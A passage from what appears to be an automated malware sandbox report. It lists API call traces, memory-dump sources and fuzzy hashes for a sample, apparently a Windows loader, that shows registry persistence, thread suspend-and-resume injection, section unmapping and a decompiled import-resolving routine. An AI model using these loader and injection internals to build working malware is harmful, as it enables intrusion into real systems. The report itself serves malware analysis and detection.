    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 33
  • API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs
  • String ID:
  • API String ID: 3071814901-0
  • Opcode ID: d05e3ff4273796c9b17326ba3024fd4693d54f1ec967c9ade7a5abc202e65e4f
  • Instruction ID: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
  • Opcode Fuzzy Hash: 8DF08B71654AC2CBD22778A6A6517BBF901FB532C3C4E3732DC40251681F4232D22B1B
  • Instruction Fuzzy Hash: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
APIs
    • Part of subcall function 001C7262: memset.NTDLL ref: 001C7284
    • Part of subcall function 001C7262: lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
    • Part of subcall function 001C7262: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
    • Part of subcall function 001C7262: CloseHandle.KERNEL32(?), ref: 001C7331
  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001C4D32
  • CloseHandle.KERNEL32(?), ref: 001C4D3E
  • lstrlenW.KERNEL32(00000000), ref: 001C4D58
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C4D69
  • wcstombs.NTDLL ref: 001C4D7A
  • lstrlen.KERNEL32(?), ref: 001C4D87
    • Part of subcall function 001D9462: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,001C4D99), ref: 001D9472
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • UnmapViewOfFile.KERNEL32(?,?,?,?,00000000,00000001), ref: 001C4DBC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C4DCE
  • DeleteFileW.KERNEL32(?), ref: 001C4DDC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: 7849c8b9b33a94634046e8246dea9d068437be0b98cf428e6df4f247afe7f281
  • Instruction ID: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
  • Opcode Fuzzy Hash: F1F0278087CDC3C3CA49888A09653622058EFE2B45CBC9398B4803901C1FA03D6A2B8E
  • Instruction Fuzzy Hash: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
APIs
  • PathFindFileNameW.SHLWAPI(01B3618C), ref: 01B31246
  • lstrcmpiW.KERNEL32(00000000,?,01B37494), ref: 01B3124D
  • RegOpenKeyExA.ADVAPI32(80000001,01B38080,00000000,00000000,?,?,01B37494), ref: 01B3127E
  • lstrlenW.KERNEL32(?,01B37494), ref: 01B31292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 01B312AA
  • RegQueryValueExW.ADVAPI32(?,00000000,01B37494,00000000,01B37494,?,01B37494), ref: 01B312C9
  • StrStrIW.SHLWAPI(00000000), ref: 01B312E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B312F9
  • RegCloseKey.ADVAPI32(?,?,01B37494), ref: 01B31302
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 193527b1eef174f7d3812915e618651906c6adafd0bce5f2d714c946695c6d1b
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: A7F02E4D155F71CAE17D2005187BBAA70C3F39671BD25E9031552B31076991B3292FCC
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44);
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,004015E0,?), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,004015E0,?), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,004015E0,?), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
